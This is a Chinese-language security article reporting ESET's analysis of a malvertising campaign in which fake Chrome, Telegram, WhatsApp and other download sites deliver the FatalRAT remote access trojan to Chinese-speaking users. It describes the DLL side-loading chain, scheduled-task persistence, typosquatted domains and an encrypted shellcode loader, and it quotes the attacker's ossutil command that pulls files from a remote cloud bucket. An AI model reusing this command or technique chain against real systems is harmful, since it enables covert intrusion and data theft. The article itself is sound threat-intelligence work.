近日，ESET的安全研究人員發(fā)現(xiàn)了一種針對(duì)東南亞和東亞華裔人群的惡意軟件活動(dòng)。攻擊者通過(guò)在Google搜索結(jié)果中購(gòu)買(mǎi)誤導(dǎo)性廣告，誘騙受害者下載安裝木馬安裝程序。未知的攻擊者創(chuàng)建了虛假網(wǎng)站，看起來(lái)類似于火狐瀏覽器、WhatsApp或Telegram等流行應(yīng)用程序的網(wǎng)站，但除了提供合法軟件外，他們還提供了一種遠(yuǎn)程訪問(wèn)木馬FatalRAT，使攻擊者能夠控制受害的計(jì)算機(jī)設(shè)備。

關(guān)鍵發(fā)現(xiàn)

• 攻擊者購(gòu)買(mǎi)廣告，將他們的惡意網(wǎng)站定位在谷歌搜索結(jié)果的“贊助”部分。在ESET向谷歌報(bào)告此問(wèn)題后，谷歌已將這些惡意廣告移除。
• 這些網(wǎng)站大多數(shù)使用的是中文并且提供軟件的中文版本，這表明攻擊者主要針對(duì)的是華語(yǔ)人群。
• 調(diào)查數(shù)據(jù)顯示，受害者大多在東南亞和東亞，這表明廣告針對(duì)的是該地區(qū)。
• ESET在2022年8月至2023年1月期間觀察到這些攻擊，但根據(jù)其遙測(cè)數(shù)據(jù)顯示，至少?gòu)?022年5月開(kāi)始這些虛假安裝程序就已經(jīng)開(kāi)始運(yùn)行。
• 在這次攻擊中使用的惡意軟件或網(wǎng)絡(luò)基礎(chǔ)設(shè)施都沒(méi)有與任何已命名組織的已知活動(dòng)相匹配，因此目前ESET還沒(méi)有將此活動(dòng)歸因于任何已知組織。

受害者研究

根據(jù)ESET提供的攻擊熱圖顯示，2022年8月至2023年1月期間，大多數(shù)攻擊影響了中國(guó)大陸及香港和臺(tái)灣地區(qū)。其他少數(shù)受害群體依次來(lái)自馬來(lái)西亞、日本、菲律賓、泰國(guó)、新加坡、印度尼西亞和緬甸。

【圖1：2022年8月至2023年1月期間，ESET檢測(cè)到的受害者地理分布】

攻擊概況

圖2展示了攻擊的簡(jiǎn)單概況。由多個(gè)組件組成的鏈條最終會(huì)安裝AT&T研究人員于2021年8月發(fā)現(xiàn)的FatalRAT惡意軟件。據(jù)悉，這是一種遠(yuǎn)程訪問(wèn)木馬，允許攻擊者獲取受害者計(jì)算機(jī)設(shè)備的控制權(quán)，包括執(zhí)行任意shell命令、下載運(yùn)行文件、從網(wǎng)絡(luò)瀏覽器竊取數(shù)據(jù)以及捕獲鍵入信息等。

【圖2：攻擊的簡(jiǎn)單概況】

虛假網(wǎng)站

攻擊者注冊(cè)了各種域名，這些域名都指向同一個(gè)IP地址：一個(gè)服務(wù)器托管多個(gè)下載木馬軟件的網(wǎng)站。其中一些網(wǎng)站看起來(lái)與合法網(wǎng)站一模一樣，但卻提供惡意安裝程序。其他可能由攻擊者翻譯的網(wǎng)站則提供了中國(guó)人無(wú)法使用的軟件的中文版本，如Telegram，詳見(jiàn)圖3。

【圖3：傳遞 FatalRAT惡意軟件的虛假Telegram網(wǎng)站】

ESET觀察了這些應(yīng)用程序的惡意網(wǎng)站和安裝程序，按受歡迎程度排序大致為：

• Chrome；
• Firefox；
• Telegram；
• WhatsApp；
• Line；
• Signal；
• Skype；
• Electrum比特幣錢(qián)包；
• 搜狗拼音輸入法；
• 有道詞典；
• WPS Office。

更多其他虛假網(wǎng)站詳見(jiàn)圖4。結(jié)果顯示，除了Electrum比特幣錢(qián)包網(wǎng)站外，其他網(wǎng)站都是中文網(wǎng)站，這表明攻擊者主要針對(duì)華語(yǔ)群體。

【圖4：攻擊者為提供惡意安裝程序而創(chuàng)建的虛假網(wǎng)站】

從理論上講，潛在的受害者有很多可能的途徑被引導(dǎo)到這些虛假網(wǎng)站，一家新聞網(wǎng)站報(bào)道稱，當(dāng)他們?cè)诠雀柚兴阉鱂irefox瀏覽器時(shí)，會(huì)看到一則廣告，引導(dǎo)他們進(jìn)入這些惡意網(wǎng)站之一。我們無(wú)法重現(xiàn)這樣的搜索結(jié)果，但相信這些廣告只提供給了目標(biāo)地區(qū)的用戶。

據(jù)悉，在ESET向谷歌報(bào)告此問(wèn)題后，谷歌已將這些惡意廣告移除。

【圖5：Firefox的搜索結(jié)果中，有一個(gè)虛假網(wǎng)站的廣告】

鑒于攻擊者為其網(wǎng)站注冊(cè)的許多域名與合法域名非常相似，攻擊者也有可能依靠拼寫(xiě)錯(cuò)誤來(lái)吸引潛在的受害者訪問(wèn)他們的網(wǎng)站。一些例子包括：

• telegraem. org（假的）VS. telegram.org（合法的）；
• electrumx. org（假的）VS. electrum.org（合法的）；
• youedao. Com（假的）VS.youdao.com（合法的）；

安裝程序

從虛假網(wǎng)站下載的安裝程序并不是托管在與網(wǎng)站相同的服務(wù)器上，而是托管在阿里云對(duì)象存儲(chǔ)服務(wù)（Alibaba Cloud Object Storage Service）中。它們是用高級(jí)安裝程序創(chuàng)建的數(shù)字簽名MSI文件。圖6顯示了攻擊者在2023年1月6日上載到云存儲(chǔ)的惡意安裝程序。

【圖6：2023年1月6日，攻擊者將惡意安裝程序上傳到云存儲(chǔ)】

當(dāng)執(zhí)行這些安裝程序時(shí)，它們通常:

• 在%PROGRAMDATA%\Progtmy目錄下，刪除并執(zhí)行惡意加載程序，以及運(yùn)行FatalRAT惡意軟件所需的文件；
• 刪除%PROGRAMDATA%\Progtmy\0目錄中的惡意更新程序和相關(guān)文件；
• 在%USERPROFILE%目錄中放置一個(gè)名為ossutilconfig的文件。此文件包含更新程序用于連接到阿里云中的遠(yuǎn)程桶的憑據(jù)；
• 創(chuàng)建一個(gè)空目錄%PROGRAMDATA%\Progptp，不過(guò)我們觀察到一些情況下FatalRAT惡意軟件會(huì)被安裝在這個(gè)目錄中；
• 刪除并執(zhí)行C:\Program Files\Common Files中的合法安裝程序；
• 創(chuàng)建計(jì)劃任務(wù)以執(zhí)行加載程序和更新程序組件；

該惡意軟件通過(guò)側(cè)載（side-loading）惡意DLL libpng13.dll運(yùn)行，該DLL被sccs.exe（瀏覽器支持模塊）使用，sccs.exe是迅雷開(kāi)發(fā)的合法可執(zhí)行文件。原始libpng13.dll也包含在安裝包中（重命名為一個(gè)隨機(jī)名稱），因?yàn)閻阂釪LL將其導(dǎo)出的函數(shù)轉(zhuǎn)發(fā)到原始DLL。惡意DLL中轉(zhuǎn)發(fā)的一些導(dǎo)出如圖7所示。圖像顯示，在本例中，原始DLL被重命名為BHuedjhd.dll，惡意DLL被編譯為Dll22.dll。

【圖7：在惡意DLL中被轉(zhuǎn)發(fā)到原DLL的部分導(dǎo)出函數(shù)】

惡意軟件更新程序以類似的方式執(zhí)行，通過(guò)側(cè)載dr.dll，由騰訊開(kāi)發(fā)的合法簽名二進(jìn)制文件使用。惡意DLL非常簡(jiǎn)單，并執(zhí)行OSSUTIL（包含在安裝包中的su.exe）從攻擊者控制的阿里云桶中下載文件。DLL執(zhí)行的命令是：

cmd /C “C:\ProgramData\Progtmy\2\ssu.exe cp -r oss://occ-a1/dll/3/ C:\ProgramData\Progtmy\ –update”

這應(yīng)該從遠(yuǎn)程存儲(chǔ)桶occ-a1（與用于存儲(chǔ)安裝程序的桶不同，但在同一個(gè)帳戶中）更新%PROGRAMDATA%\Progtmy本地目錄中的文件，但是它在我們分析的任何安裝程序中都不起作用，因?yàn)?PROGRAMDATA%\Progtmy\2子目錄不存在（它應(yīng)該是由安裝程序創(chuàng)建的子目錄0）。

攻擊者在為更新程序創(chuàng)建的計(jì)劃任務(wù)上犯了同樣的錯(cuò)誤，因?yàn)閳?zhí)行路徑也引用了不存在的子目錄2。在大多數(shù)情況下，會(huì)創(chuàng)建四個(gè)計(jì)劃任務(wù)：兩個(gè)用于RAT（一組定期執(zhí)行，另一組在任何用戶登錄到PC時(shí)執(zhí)行），兩個(gè)用于更新程序。任務(wù)的名稱基于Windows構(gòu)建號(hào)和計(jì)算機(jī)名稱，如圖8所示。

【圖8：由惡意安裝程序創(chuàng)建的計(jì)劃任務(wù)】

加載程序

加載程序libpng13.dll是一個(gè)非常簡(jiǎn)單的組件，它在內(nèi)存中打開(kāi)并執(zhí)行一個(gè)名為Micr.jpg的文件，該文件位于和DLL相同的目錄中。攻擊者通過(guò)多次調(diào)用只打印一些硬編碼值的函數(shù)來(lái)混淆加載程序。使用此行為可能是為了避免被安全解決方案檢測(cè)到，或使DLL的分析復(fù)雜化。

【圖9：左邊顯示了混淆的代碼，右邊顯示了去混淆的代碼】

Micr.jpg實(shí)際上是包含嵌入式DLL的shellcode。該shellcode的目的是通過(guò)調(diào)用名為SignalChromeElf的DLL的導(dǎo)出函數(shù)來(lái)加載并在內(nèi)存中執(zhí)行嵌入式DLL。在執(zhí)行這個(gè)導(dǎo)出函數(shù)之前，shellcode重構(gòu)DLL的導(dǎo)入表并調(diào)用DllEntryPoint，它簡(jiǎn)單地調(diào)用Windows API函數(shù)DisableThreadLibraryCalls來(lái)增加DLL的隱蔽性。

SignalChromeElf本質(zhì)上將解密、加載并執(zhí)行嵌入DLL中的加密有效載荷。這個(gè)加密的有效載荷是FatalRAT惡意軟件，在它解密后，DLL將找到一個(gè)名為SVP7的導(dǎo)出函數(shù)的地址，其中包含惡意軟件的入口點(diǎn)，并調(diào)用它，將FatalRAT的加密配置作為參數(shù)傳遞。

嵌入式DLL中解密有效負(fù)載的函數(shù)與FatalRAT中用于解密其配置的函數(shù)相同。圖10顯示了該函數(shù)的一個(gè)示例。

FatalRAT

FatalRAT是一種遠(yuǎn)程訪問(wèn)木馬，由AT&T Alien Labs于2021年8月記錄。這種惡意軟件提供了一組功能，在受害者的計(jì)算機(jī)上執(zhí)行各種惡意活動(dòng)。例如，該惡意軟件可以：

• 捕獲按鍵信息；
• 改變受害者的屏幕分辨率；
• 終止瀏覽器進(jìn)程并竊取或刪除其存儲(chǔ)的數(shù)據(jù)，目標(biāo)瀏覽器是：Chrome、火狐、QQ以及搜狗；
• 下載并執(zhí)行一個(gè)文件；
• 執(zhí)行shell命令；

該惡意軟件包含各種檢查，以確定它是否在虛擬環(huán)境中運(yùn)行。根據(jù)其配置，這些檢查可能被執(zhí)行，也可能不被執(zhí)行。

根據(jù)ESET的分析結(jié)果可以確定這次活動(dòng)中使用的FatalRAT版本與AT&T在其博文中記錄的版本非常相似，所以這里不會(huì)贅述更多細(xì)節(jié)。圖11顯示了它們之間的比較，圖10顯示了用于解密來(lái)自該活動(dòng)的FatalRAT樣本中的字符串的反編譯代碼，這與AT&T所描述的相同。

【圖10：FatalRAT樣本用于解密其配置字符串的函數(shù)的反編譯代碼】

【圖11：AT&T分析的FatalRAT樣本與該活動(dòng)中發(fā)現(xiàn)的FatalRAT樣本之間的BinDiff比較】

先前版本

ESET研究人員還發(fā)現(xiàn)了攻擊者至少?gòu)?022年5月就開(kāi)始使用的惡意安裝程序的先前版本。與上述安裝程序不同，這個(gè)版本包含一個(gè)xor加密的有效負(fù)載，分為三個(gè)文件：Micr. Flv、Micr2. flv以及Micr3. flv。每個(gè)文件都用不同的單字節(jié)XOR密鑰加密。一旦解密，這三個(gè)文件的內(nèi)容將被連接起來(lái)，形成與C&C服務(wù)器聯(lián)系以下載和執(zhí)行進(jìn)一步shellcode的shellcode。

在這種情況下，加載程序DLL被命名為dr.dll——與安裝程序的后續(xù)版本中用于更新機(jī)制的名稱相同，由相同的合法可執(zhí)行文件側(cè)加載。鑒于這個(gè)舊版本似乎沒(méi)有更新程序，研究人員認(rèn)為攻擊者自2022年8月以來(lái)已經(jīng)用新版本的安裝程序取代了它。

結(jié)語(yǔ)

攻擊者花費(fèi)了很大精力，試圖將其網(wǎng)站使用的域名盡可能地與官方名稱相似。在大多數(shù)情況下，虛假網(wǎng)站甚至是合法網(wǎng)站的相同副本。至于木馬安裝程序，它們會(huì)安裝用戶感興趣的實(shí)際應(yīng)用程序，從而盡可能地避免被懷疑。由于所有這些原因，我們看到在下載軟件之前仔細(xì)檢查我們?cè)L問(wèn)的URL是多么重要。更好的做法是，在檢查它是否是實(shí)際的供應(yīng)商站點(diǎn)后，再將它輸入到瀏覽器的地址欄中。

由于這次活動(dòng)使用的惡意軟件FatalRAT包含了用于操縱來(lái)自不同瀏覽器數(shù)據(jù)的各種命令，而且受害者并不是針對(duì)特定類型的用戶，因此任何人都可能受到影響。攻擊者可能只對(duì)竊取網(wǎng)絡(luò)證書(shū)等信息感興趣，并在地下論壇上出售它們，或?qū)⑺鼈冇糜诹硪环N類型的犯罪軟件活動(dòng)，但目前還不可能將這種活動(dòng)具體歸因于已知或新的威脅行為者。